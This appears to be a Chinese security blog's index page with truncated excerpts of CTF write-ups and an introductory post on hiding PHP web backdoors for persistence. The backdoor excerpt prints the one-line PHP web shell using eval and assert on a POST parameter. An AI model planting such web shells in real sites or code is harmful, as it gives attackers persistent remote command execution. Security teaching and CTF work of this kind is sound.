Sword Soul

[CTF]Defcon-CTF-Quals-2014-Routarded/Hackertool/3dttt-Writeup

Routarded Points: 1

Description:

Wow, they forwarded http on a router with default creds? It must be my birthday!

http://routarded_87f7837f50a5370771b9467d840c93c5.2014.shallweplayaga.me:5000/

我不会向你叙述一个汉语狗由于对It must be my birthday的错误理解引起的辛酸历程...

题目已述,使用默认凭据可以登陆服务器,基础认证,BurpSuite跑了几遍......

Web后门隐藏与维持 - Web Backdoor Hidden and Maintenance

前言

在一个成功的测试后,通常会想让特权保持的更久些.留后门的工作就显得至关重要,通常布设的后门包括但不限于数据库权限,WEB权限,系统用户权限等等.此文则对大众后门隐藏的一些思路做科普.

以PHP-WEBBACKDOOR为例,抛砖引玉

一个最常见的一句话后门可能写作这样

<?php @eval($_POST['cmd']);?>

或这样

<?php @assert($_POST['cmd']);?>

当然,这仅是调用的函数不同,关于PHP禁用的函数请在

php.ini: disable_functions =

中寻......

[CTF]ASIS-CTF-Quals-2014-Trivia2/ToqToq-Writeup

Trivia2 [Trivia10]

说明:

Trivia 2 Points 10

Description

Downtime caused to a website by massive referrals from another popular site.

Do not calculate md5 or add ASIS_

联想最近的FaceBook的DDos文章

http://chr13.com/2014/04/20/using-facebook-notes-to-ddos-any-website/

借助搜索引擎搜索试来试去得到Wiki里这个关键词:

......